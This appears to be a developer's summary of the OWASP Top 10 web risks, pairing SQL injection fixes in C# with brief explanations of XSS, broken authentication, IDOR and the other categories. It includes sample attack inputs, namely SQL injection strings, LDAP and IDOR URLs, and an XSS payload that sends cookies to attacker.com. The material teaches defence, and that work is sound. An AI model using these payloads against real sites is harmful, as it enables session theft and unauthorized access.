OWASP

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software and websites.

1. Injection

Common types of injection types are:

SQL injection (SQL injection occurs when a user-supplied field is not strongly typed or not filtered for escape characters or is not checked for type constraints) as in the following:

(SELECT * FROM Authentication WHERE name = '' OR '1'='1' -)
Another scenario is that if the hacker knows your LoginName, for example your LoginName is “Admin”, they can simply append the value '- - and your SQL query will now become something like this:
 
Select * from SYSUser where LoginName= 'Admin'--' and PasswordEncryptedText=''
 
If you have noticed the remaining condition in your WHERE clause, it was commented out because of the injected SQL syntax in order to disregard the remaining condition. So if the LoginName “Admin” exists in your database then your dt.Rows.Count will be > 0 granting the hacker access to your website.
 1) Use Parameterized queries- parameterized queries are sent to SQL Server, they are executed via system stored procedure sp_executesql. Again, the SQL parameter query will be sent to SQL Server and then executed by sp_executesql command. Based on our example, the query will be issued like this:
 
exec sp_executesql N'SELECT * FROM GridViewDynamicData WHERE Field1 = @SearchText', N'@SearchText varchar(50)',@SearchText='Test 3'
 
When the command executes, the parameters and the query text are treated separately. Any SQL syntax that the value of string might contain will be treated as a part of the literal string and not as a part of SQL statement. This is actually how SQL Injection is prevented.
2) use stored procedures
3) using ORM
4) By using the SqlCommand and its child collection of parameters all the pain of checking for sql injection is taken away from you and will be handled by these classes.

Here is an example, taken from one of the articles above:

private static void UpdateDemographics(Int32 customerID,
    string demoXml, string connectionString)
{
    // Update the demographics for a store, which is stored  
    // in an xml column.  
    string commandText = "UPDATE Sales.Store SET Demographics = @demographics "
        + "WHERE CustomerID = @ID;";

    using (SqlConnection connection = new SqlConnection(connectionString))
    {
        SqlCommand command = new SqlCommand(commandText, connection);
        command.Parameters.Add("@ID", SqlDbType.Int);
        command.Parameters["@ID"].Value = customerID;

        // Use AddWithValue to assign Demographics. 
        // SQL Server will implicitly convert strings into XML.
        command.Parameters.AddWithValue("@demographics", demoXml);

        try
        {
            connection.Open();
            Int32 rowsAffected = command.ExecuteNonQuery();
            Console.WriteLine("RowsAffected: {0}", rowsAffected);
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
        }
    }
}
Sql injection can be done when your application is making database calls via sql that is formed as a result of concatenated text...instead you need to use parametrized querying...

Avoid creating sql as below:

string sql = "Select * from Customer where Name = " + txtName.Text;
Instead use Parameterized queries...something like

"Select * from Customer where Name = @Name"
Hope this helps...



OS Injection (occurs when calling external applications from your application, for example by using System.Diagnostics.Process.Start is a .Net command to call an OS function).

LDAP injection (LDAP Injection occurs when a hacker constructs LDAP statements based on user input, for example if the site is using Active Directory).

http://www.mysite.com/Auther.aspx?uid=*
2. Broken Authentication and Session Management
A variant of this is when an unwanted user gets administrator privileges, thus putting the whole system at risk
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities
This type of security issue is caused by the following:

Authentication credentials aren't protected properly.
Weak session IDs.
SessionIDs are exposed in the URL.
Session IDs don't time out
Session IDs aren't rotated after successful login
Passwords, session IDs, and other credentials are sent over unencrypted connections
3. Cross-Site Scripting (XSS)

This type of Security issue occurs if all user supplied input is not properly escaped, or not verified to be safe using input validation  as in the following:

(String) page += "<input name='mycarddetails' type='TEXT' value='" + request.getParameter("DB") + "'>";

The attacker can modify the "DB" parameter in their browser to:

'><script>document.location= 'http://www.attacker.com/dataforge.cgi ?foo='+document.cookie</script>'.
Using HTTPS doesn't prevent a CSRF attack. The malicious site can send an https://www.good-banking-site.com/ request just as easily as it can send an insecure request.
use AntiForgeryTokens on every POST action to easily prevent Cross-Site Request Forgery attacks.

4. Insecure Direct Object References
A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data

This type of security issue occurs when the software failed to verify whether the user is authorized to access the exact resource they have requested or not.

http://example.com/app/accountInfo?acct=notmyacct

5. Security Misconfiguration

This type of security issue occurs if your software is out of date or there are any unnecessary features enabled or installed or default accounts and their passwords are still enabled and unchanged or security settings in your development frameworks and libraries are not set to secure values.

6. Sensitive Data Exposure

This type of security issue occurs if proper measures are not taken on the data when at rest, in transit or in browsers.

7. Missing Function Level Access Control

This type of security issue occurs when anyone with the network access can access private functionality from a different user or send private requests from there.

8. Cross-Site Request Forgery

This type of security issue occurs by forcing the victim's browser to generate requests, while as an authenticated user.

9. Using Components with Known Vulnerabilities

This type of security issue occurs when a hacker identifies a weak or vulnerable component used in the website and tries to attack that component.

10. Unvalidated Redirects and Forwards

This type of security issue occurs when using invalidated redirects and forwards. Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input.

